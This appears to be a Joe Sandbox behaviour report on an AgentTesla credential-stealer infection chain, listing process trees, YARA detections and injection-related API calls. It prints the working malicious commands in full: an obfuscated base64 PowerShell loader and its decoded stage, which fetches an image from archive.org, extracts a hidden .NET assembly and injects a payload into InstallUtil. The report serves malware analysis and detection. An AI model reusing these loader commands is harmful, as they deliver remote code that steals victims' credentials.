Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	03:27:53
Start date:	30/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBF? ? ? ? ?E4? ? ? ? ?R? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?TwBm? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?t? ? ? ? ?Gc? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D? ? ? ? ?? ? ? ? ?I? ? ? ? ?? ? ? ? ?t? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?t? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cs? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?LgBM? ? ? ? ?GU? ? ? ? ?bgBn? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?t? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BD? ? ? ? ?G8? ? ? ? ?bQBt? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBT? ? ? ? ?HU? ? ? ? ?YgBz? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BM? ? ? ? ?GU? ? ? ? ?bgBn? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bj? ? ? ? ?G8? ? ? ? ?bQBt? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?QwBv? ? ? ? ?G4? ? ? ? ?dgBl? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?Bd? ? ? ? ?Do? ? ? ? ?OgBG? ? ? ? ?HI? ? ? ? ?bwBt? ? ? ? ?EI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BD? ? ? ? ?G8? ? ? ? ?bQBt? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?UgBl? ? ? ? ?GY? ? ? ? ?b? ? ? ? ?Bl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?G8? ? ? ? ?bg? ? ? ? ?u? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQBd? ? ? ? ?Do? ? ? ? ?OgBM? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bj? ? ? ? ?G8? ? ? ? ?bQBt? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B0? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GQ? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?V? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bu? ? ? ? ?Gw? ? ? ? ?aQBi? ? ? ? ?C4? ? ? ? ?SQBP? ? ? ? ?C4? ? ? ? ?S? ? ? ? ?Bv? ? ? ? ?G0? ? ? ? ?ZQ? ? ? ? ?n? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?G0? ? ? ? ?ZQB0? ? ? ? ?Gg? ? ? ? ?bwBk? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?E0? ? ? ? ?ZQB0? ? ? ? ?Gg? ? ? ? ?bwBk? ? ? ? ?Cg? ? ? ? ?JwBW? ? ? ? ?EE? ? ? ? ?SQ? ? ? ? ?n? ? ? ? ?Ck? ? ? ? ?LgBJ? ? ? ? ?G4? ? ? ? ?dgBv? ? ? ? ?Gs? ? ? ? ?ZQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?bgB1? ? ? ? ?Gw? ? ? ? ?b? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBv? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?Bb? ? ? ? ?F0? ? ? ? ?XQ? ? ? ? ?g? ? ? ? ?Cg? ? ? ? ?JwB0? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?RwBS? ? ? ? ?E8? ? ? ? ?LwBn? ? ? ? ?G8? ? ? ? ?b? ? ? ? ?? ? ? ? ?v? ? ? ? ?G0? ? ? ? ?bwBj? ? ? ? ?C4? ? ? ? ?bwBu? ? ? ? ?GE? ? ? ? ?c? ? ? ? ?Bu? ? ? ? ?GE? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?HM? ? ? ? ?c? ? ? ? ?B0? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?MQ? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Qw? ? ? ? ?6? ? ? ? ?Fw? ? ? ? ?U? ? ? ? ?By? ? ? ? ?G8? ? ? ? ?ZwBy? ? ? ? ?GE? ? ? ? ?bQBE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Fw? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GE? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?dgBp? ? ? ? ?GM? ? ? ? ?ZQ? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?JwBJ? ? ? ? ?G4? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?b? ? ? ? ?Bs? ? ? ? ?FU? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?Gw? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?Ck? ? ? ? ?KQ? ? ? ? ?=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:27:53
Start date:	30/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	03:27:55
Start date:	30/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'alarvice','InstallUtil','desativado'))"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1778936511.000001CB9586E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1778936511.000001CB9586E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:27:59
Start date:	30/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\alarvice.js"
Imagebase:	0x7ff705cc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:27:59
Start date:	30/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:28:02
Start date:	30/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0xc00000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2946845698.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2946845698.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2946845698.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2946845698.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2943800071.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2943800071.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Function 00007FFD9B9037B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1840983730.00007FFD9B900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b900000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction ID: 8282e8c406f5608553c49fee455491287b98c2c5473ff58c77b28f0e0c50683b
Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction Fuzzy Hash: 7A01677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5D636E882CB45

Analysis Process: powershell.exePID: 7552, Parent PID: 7388COMMON

Execution Graph

Execution Coverage:	6.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	31
Total number of Limit Nodes:	1

Executed Functions

Function 00007FFD9B935FF2 Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 535
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

L_I, xrefs: 00007FFD9B936044

Memory Dump Source

Source File: 00000003.00000002.1807183310.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b930000_powershell.jbxd

Similarity

API ID:
String ID: L_I
API String ID: 0-1627180413
Opcode ID: b40837b157c6e584972dd6f0172d60042fad73f1278b256d02c8a3567228f83f
Instruction ID: d5b201aceeeedbc0dadd3f13aaedb318f866e37e053f09413c175c269481d3a5
Opcode Fuzzy Hash: b40837b157c6e584972dd6f0172d60042fad73f1278b256d02c8a3567228f83f
Instruction Fuzzy Hash: 7D027D70A09A5D8FDB98DF58C894BE9BBF1FB69310F1041AED04DE32A1DB359985CB40

Function 00007FFD9B937A01 Relevance: 1.8, APIs: 1, Instructions: 319
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32 ref: 00007FFD9B937CAA

Memory Dump Source

Source File: 00000003.00000002.1807183310.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b930000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 58be7ccfe4098ca009e71dd5f66fee1bd88c1ec7acb1c1a156ddbe1495f513ce
Instruction ID: bd11e7fcf51db4085feac9fd11e10aecb960ceded0dcbd667880d3a261c5505c
Opcode Fuzzy Hash: 58be7ccfe4098ca009e71dd5f66fee1bd88c1ec7acb1c1a156ddbe1495f513ce
Instruction Fuzzy Hash: FAA10770909A5D8FDB99DF58C894BE9BBF1FB6A301F0001AED44AE3691DB759980CF40

Function 00007FFD9B93833D Relevance: 1.7, APIs: 1, Instructions: 212
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32 ref: 00007FFD9B9384AE

Memory Dump Source

Source File: 00000003.00000002.1807183310.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b930000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 6dafe6342a73a8317d33924a176fb43b4ac85402aae0c36ec49098d579ff3d7e
Instruction ID: 98f84024d8ed06635262207068e743327594ca4a759c68ad3332e7028cfc110b
Opcode Fuzzy Hash: 6dafe6342a73a8317d33924a176fb43b4ac85402aae0c36ec49098d579ff3d7e
Instruction Fuzzy Hash: 08611470908A5C8FDB98DF98C894BE9BBF1FB69310F1041AED04DE3291DB74A985CB44

Function 00007FFD9B937E39 Relevance: 1.7, APIs: 1, Instructions: 186
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32 ref: 00007FFD9B937F7E

Memory Dump Source

Source File: 00000003.00000002.1807183310.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b930000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 20db73380d74647821895919e6422abc7eb5231d5d4f0edc43d112830a93a5e5
Instruction ID: 77b722e72b45d9f0cb38e02f7cebb4c435b9ea643dfe343f42562eef1343793a
Opcode Fuzzy Hash: 20db73380d74647821895919e6422abc7eb5231d5d4f0edc43d112830a93a5e5
Instruction Fuzzy Hash: 51518D30D08A4D8FDB55DFA8C844BE9BBF1FB66311F1482AAD048D7266D7749885CF40

Function 00007FFD9B938529 Relevance: 1.6, APIs: 1, Instructions: 136
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32 ref: 00007FFD9B9385F9

Memory Dump Source

Source File: 00000003.00000002.1807183310.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b930000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 5e27c7f58342c3514997d4c4e5a3a2d55397f42290e80590610f32ed0fa80722
